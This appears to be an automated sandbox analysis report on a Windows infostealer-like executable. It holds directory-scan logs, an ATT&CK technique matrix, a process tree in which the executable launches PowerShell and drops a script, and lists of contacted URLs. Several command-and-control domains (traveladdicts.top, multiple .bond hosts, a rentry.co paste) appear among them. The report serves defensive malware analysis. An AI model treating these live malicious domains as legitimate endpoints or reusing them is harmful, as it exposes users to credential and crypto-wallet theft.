              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000000.00000003.1908607385.000000000087B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix (techniques listed per tactic; the numbers in parentheses are carried over from the matrix as shown in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (2); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (221); Process Injection (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing; Steganography
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (221); Application Window Discovery (1); File and Directory Discovery (21); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Web Service (1); Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (115); Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID 1601483; sample #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; start date 28/01/2025; architecture WINDOWS; score 100). Information recovered from the graph:

Process tree: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe (started) -> powershell.exe (started) -> conhost.exe (started)
Dropped file: C:\Users\user\...\KOZ4VON644XMYEN5.ps1 (HTML)
Network: traveladdicts.top (172.67.202.141, port 443, source ports 49224 and 49233, CLOUDFLARENETUS, United States); rentry.co (104.26.3.16, port 443, source port 49237, CLOUDFLARENETUS, United States); 18.31.95.13.in-addr.arpa
Signatures on the graph: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures; Connects to a pastebin service (likely for C&C), attached to rentry.co; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 3 other signatures

Source | Detection | Scanner | Label
#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | 3% | Virustotal |
#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | 8% | ReversingLabs | Win32.Trojan.Delf
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
moonehobno.bond | 100% | Avira URL Cloud | malware
traveladdicts.top | 0% | Avira URL Cloud | safe
https://traveladdicts.top/api | 0% | Avira URL Cloud | safe
https://traveladdicts.top/api6Ic= | 0% | Avira URL Cloud | safe
https://traveladdicts.top/d | 0% | Avira URL Cloud | safe
noxiuos-utopi.bond | 100% | Avira URL Cloud | malware
https://traveladdicts.top/z | 0% | Avira URL Cloud | safe
learnyprocce.bond | 100% | Avira URL Cloud | malware
https://traveladdicts.top/r | 0% | Avira URL Cloud | safe
rainy-lamep.bond | 100% | Avira URL Cloud | malware
elfinyamen.bond | 100% | Avira URL Cloud | malware
https://traveladdicts.top:443/apitps://traveladdicts.top:443/api | 0% | Avira URL Cloud | safe
https://traveladdicts.top/ | 0% | Avira URL Cloud | safe
cowertbabei.bond | 100% | Avira URL Cloud | malware
https://traveladdicts.top/api2 | 0% | Avira URL Cloud | safe
http://crl.microXO | 0% | Avira URL Cloud | safe
https://traveladdicts.top/n)6 | 0% | Avira URL Cloud | safe
abaft-taboo.bond | 100% | Avira URL Cloud | malware
conquemappe.bond | 100% | Avira URL Cloud | malware
http://www.testlab2008.com/indices/submit.php?c=CD&i= | 0% | Avira URL Cloud | safe
https://traveladdicts.top:443/api | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
traveladdicts.top | 172.67.202.141 | true | true | | unknown
rentry.co | 104.26.3.16 | true | false | | high
18.31.95.13.in-addr.arpa | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
moonehobno.bond | true | Avira URL Cloud: malware | unknown
traveladdicts.top | true | Avira URL Cloud: safe | unknown
rainy-lamep.bond | true | Avira URL Cloud: malware | unknown
learnyprocce.bond | true | Avira URL Cloud: malware | unknown
noxiuos-utopi.bond | true | Avira URL Cloud: malware | unknown
https://rentry.co/feouewe5/raw | false | | high
https://traveladdicts.top/api | true | Avira URL Cloud: safe | unknown
abaft-taboo.bond | true | Avira URL Cloud: malware | unknown
elfinyamen.bond | true | Avira URL Cloud: malware | unknown
conquemappe.bond | true | Avira URL Cloud: malware | unknown
cowertbabei.bond | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | false | | high
http://ocsp.sectigo.com0 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | false | | high
http://www.microsoft.co | powershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://rentry.co/hZ | powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://rentry.co/static/icons/270.pnghZ | powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://rentry.co/static/icons/512.pnghZ | powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://traveladdicts.top/d | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000805000.00000004.00000020.00020000.00000000.sdmp | false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/products/firefoxgro.all#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://traveladdicts.top/api6Ic=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1760402571.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://traveladdicts.top/r#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0##Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                high
                                                                https://traveladdicts.top/z#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758494799.000000000365A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://sectigo.com/CPS0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                  high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://rentry.co/static/icons/512.png#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drfalse
                                                                      high
                                                                      https://rentry.co/static/icons/270.pnLRpowershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.microXO#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000085C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://traveladdicts.top/n)6#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0##Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://traveladdicts.top/#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2225011826.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085160314.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2098375741.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000081C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908671086.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 
00000000.00000003.2083156314.000000000083C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907875064.000000000365F000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2255853718.0000000000820000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907535156.000000000365D000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085349574.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.000000000367C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://traveladdicts.top/api2#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://traveladdicts.top:443/apitps://traveladdicts.top:443/api#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://ocsp.rootca1.amazontrust.com0:#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
